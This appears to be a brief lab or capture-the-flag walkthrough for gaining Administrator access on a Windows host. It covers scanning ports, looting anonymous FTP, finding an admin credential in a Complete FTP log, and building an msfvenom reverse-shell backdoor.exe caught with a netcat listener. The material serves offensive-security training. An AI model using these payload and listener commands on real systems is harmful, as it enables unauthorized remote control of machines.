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87 ( by Discord: 0xhexf:6615)

Scan all ports

Login to anonymousFTP

Downalod all files

Search password in files

C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log

2020-01-06 09:05:51,600 INFO ConfigBuilder Launching C:\Program Files (x86)\Complete FTP\

Manager\CompleteFTPManager.exe localhost 14983 "admin"
roEDm7ZYh9FV2ja/9NdECkG+atC9BDLeiY+4cxtNfOTqdy4YEh3MlGZDjvpEexjb SFTP

Here is the exploit:

Generate reverse shell with MSFvenom - backdoor.exe ( lport must be 445 )

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.X.X LPORT=445 EXITFUNC=thread -f c -

a x86 -o backdoor.exe
Create python server and download backdoor.exe to .87 machine using exploit

Run exploit as shown in photo

Listen on your machine

nc -nvlp 445

You will get Administrator shell

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